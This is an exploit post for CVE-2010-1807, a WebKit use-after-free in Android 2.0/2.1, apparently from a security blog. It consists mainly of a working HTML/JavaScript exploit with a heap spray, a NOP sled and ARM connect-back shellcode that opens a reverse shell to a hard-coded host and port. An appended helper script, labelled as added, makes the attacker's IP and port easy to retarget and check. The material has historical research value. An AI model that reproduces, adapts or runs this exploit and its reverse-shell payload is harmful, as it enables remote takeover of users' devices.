Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
Source: http://imthezuk.blogspot.com  Author: Avraham  Published: 2010-11-16

# Exploit Title: Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
# Date: 14/11/2010
# Author: Itzhak Avraham, mj
# Tested on: Droid 2.1
# CVE : CVE-2010-1807


Better exploit (better rate and more flexible for changes, also shorter shellcode) than what you have, plus, it's also verified. Enjoy!
More details at: http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html


<html>
<head>
<script>
// This code is for security research/teaching purposes only; use at your own risk!

// bug     = WebKit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
// patched = Android 2.2; some said it still works on some devices with 2.2.
// originally noticed/written by mj (good job man!)
// new exploit version by Itzhak Zuk Avraham (itz2000[AT]GMAIL[DOT]COM) - http://imthezuk.blogspot.com

// Connect-back target. Every 16-bit code unit is stored as two little-endian
// bytes, so "\ua8c0\u0100" is the byte sequence c0 a8 00 01 and "\u3930" is
// 30 39 (the port in network byte order). unescape() is a no-op on these
// literals; they are JS string escapes, not "%uXXXX" sequences.
var ip = unescape("\ua8c0\u0100");   // ip = 192.168.0.1
var port = unescape("\u3930");       // port 12345 (hex 0x3039)
//var ip = unescape("\u000a\u0202"); // e.g. ip = 10.0.2.2

function trigger()
{
  var span = document.createElement("div");
  document.getElementById("BodyID").appendChild(span);
  span.innerHTML = -parseFloat("NAN(ffffe00572c60)"); // trigger use-after-free
}

function exploit()
{
  // NOP sled: "\u33bc\u0057" is the ARM word 0x005733bc (LDREQH R3,[R7],-0x3C),
  // doubled until the sled is longer than 0x1000 code units.
  var nop = unescape("\u33bc\u0057");
  do
  {
    nop += nop;
  } while (nop.length <= 0x1000);

  // ARM/Thumb connect-back shellcode: socket(AF_INET, SOCK_STREAM, IPPROTO_TCP),
  // connect() to the sockaddr_in appended below, dup2() the socket onto
  // fd 0/1/2, then switch to Thumb, setuid(0) and execve() the
  // "///system/bin/sh" string carried at its tail. The final "\u0002" is
  // sin_family (AF_INET); port and ip complete the sockaddr_in.
  var scode = nop + unescape("\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
  scode += port;                     // sin_port (network byte order)
  scode += ip;                       // sin_addr
  scode += unescape("\u2000\u2000"); // padding

  // Heap spray: write 0x1000 copies of the payload into the document, then
  // fire the use-after-free repeatedly once most of the spray is in place
  // (i > 0x999). Note that target[0x1000] is undefined on the last iteration.
  var target = new Array();
  var i;
  for (i = 0; i < 0x1000; i++)
    target[i] = scode;
  for (i = 0; i <= 0x1000; i++)
  {
    document.write(target[i] + "<i>");
    if (i > 0x999)
    {
      trigger();
    }
  }
}
</script>
</head>
<body id="BodyID">
Enjoy!
<script>
  exploit();
</script>
</body>
</html>
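The connect-back parameters above (`ip`, `port`, and the sockaddr_in at the tail of `scode`) are the part most people change when re-using this exploit, and they are easy to get wrong: each JavaScript code unit lands in the heap as two little-endian bytes, while sin_port and sin_addr must be in network byte order. The helpers below are an added example, not part of the original exploit or of the author's code. They build the `ip`/`port` strings for an arbitrary target, reconstruct one sprayed element exactly as `exploit()` does (same sled, same shellcode string, same suffix), and recover the embedded sockaddr_in by decoding the shellcode's own `ADD R1, PC, #imm` instruction, so the target can be checked before the page is served. The function names are mine; the byte layout is derived from the exploit source, and nothing here executes or verifies the shellcode itself.

```javascript
// Added example (not from the original exploit): helpers for adapting and
// checking the connect-back target that the sprayed payload embeds.
//
// The spray writes JavaScript strings, so every 16-bit code unit is stored as
// two little-endian bytes. The sockaddr_in the shellcode hands to connect()
// is built the same way: "\u0002" -> 02 00 (AF_INET), sin_port in network
// byte order, then the four address octets. unescape() in the exploit is a
// no-op on these literals ("\ua8c0" is a JS escape, not a "%uXXXX" sequence).

// ARM/Thumb connect-back shellcode, copied verbatim from the exploit above
// (everything between the NOP sled and the port/ip suffix).
const SHELLCODE = "\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002";

// Bytes -> string whose UTF-16 code units hold those bytes little-endian.
// An odd trailing byte is padded with 0x00.
function bytesToUnits(bytes) {
  let s = "";
  for (let i = 0; i < bytes.length; i += 2) {
    const hi = i + 1 < bytes.length ? bytes[i + 1] : 0;
    s += String.fromCharCode(bytes[i] | (hi << 8));
  }
  return s;
}

// String -> the bytes the engine stores for it (what the heap sees).
function unitsToBytes(str) {
  const out = [];
  for (let i = 0; i < str.length; i++) {
    const u = str.charCodeAt(i);
    out.push(u & 0xff, u >>> 8);
  }
  return out;
}

// "\ua8c0\u0100"-style literal, for pasting back into the exploit source.
function toEscaped(str) {
  let out = "";
  for (let i = 0; i < str.length; i++) {
    out += "\\u" + str.charCodeAt(i).toString(16).padStart(4, "0");
  }
  return out;
}

// Build the `port` and `ip` strings the exploit appends after scode.
function encodeTarget(ip, port) {
  const parts = ip.split(".");
  if (parts.length !== 4 || !parts.every(p => /^\d{1,3}$/.test(p))) {
    throw new Error("bad IPv4 address: " + ip);
  }
  const octets = parts.map(Number);
  if (octets.some(o => o > 255)) throw new Error("bad IPv4 address: " + ip);
  if (!Number.isInteger(port) || port < 1 || port > 65535) {
    throw new Error("bad port: " + port);
  }
  return { port: bytesToUnits([port >>> 8, port & 0xff]), ip: bytesToUnits(octets) };
}

// Same sled as exploit(): "\u33bc\u0057" doubled until longer than 0x1000
// code units, which leaves 0x2000 units (16384 bytes).
function nopSled() {
  let nop = "\u33bc\u0057";
  do { nop += nop; } while (nop.length <= 0x1000);
  return nop;
}

// One sprayed element laid out exactly as exploit() builds scode.
function buildPayload(ip, port) {
  const t = encodeTarget(ip, port);
  return nopSled() + SHELLCODE + t.port + t.ip + "\u2000\u2000";
}

// Little-endian 32-bit word at byte offset o, as an unsigned value.
function word32(b, o) {
  return (b[o] | (b[o + 1] << 8) | (b[o + 2] << 16) | (b[o + 3] << 24)) >>> 0;
}

// Locate the sockaddr_in the way the shellcode does. Its ADD R1, PC, #imm
// (0xE28F1xxx with a zero rotate field) sets R1 = address of that instruction
// + 8 + imm; decode the struct found at that byte offset of the payload.
function decodeSockaddr(payload) {
  const b = unitsToBytes(payload);
  for (let o = 0; o + 4 <= b.length; o += 4) {
    const w = word32(b, o);
    if (((w & 0xfffff000) >>> 0) !== 0xe28f1000 || (w & 0xf00) !== 0) continue;
    const off = o + 8 + (w & 0xff);
    if (off + 8 > b.length) throw new Error("sockaddr_in runs past the payload");
    return {
      offset: off,
      family: b[off] | (b[off + 1] << 8),        // 2 == AF_INET
      port: (b[off + 2] << 8) | b[off + 3],      // network byte order
      ip: [b[off + 4], b[off + 5], b[off + 6], b[off + 7]].join("."),
    };
  }
  throw new Error("no ADD R1, PC, #imm found in payload");
}

// Example: the target hard-coded in the exploit above.
const check = decodeSockaddr(buildPayload("192.168.0.1", 12345));
console.log(check, toEscaped(encodeTarget("192.168.0.1", 12345).ip));
```

Run it with node. For the exploit's own constants, `decodeSockaddr()` reports the struct at byte offset 16556 (the 16384-byte sled plus 172 bytes of shellcode, which is what `ADD R1, PC, #0x84` resolves to), family 2, port 12345 and address 192.168.0.1; `encodeTarget("10.0.2.2", 4444)` yields the `"\u000a\u0202"` literal from the commented-out line plus `"\u5c11"` for the port. If the decoded values do not match the target you intended, the spray would connect back to the wrong host even though the use-after-free itself still fires.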

Twitter account : @ihackbanme


 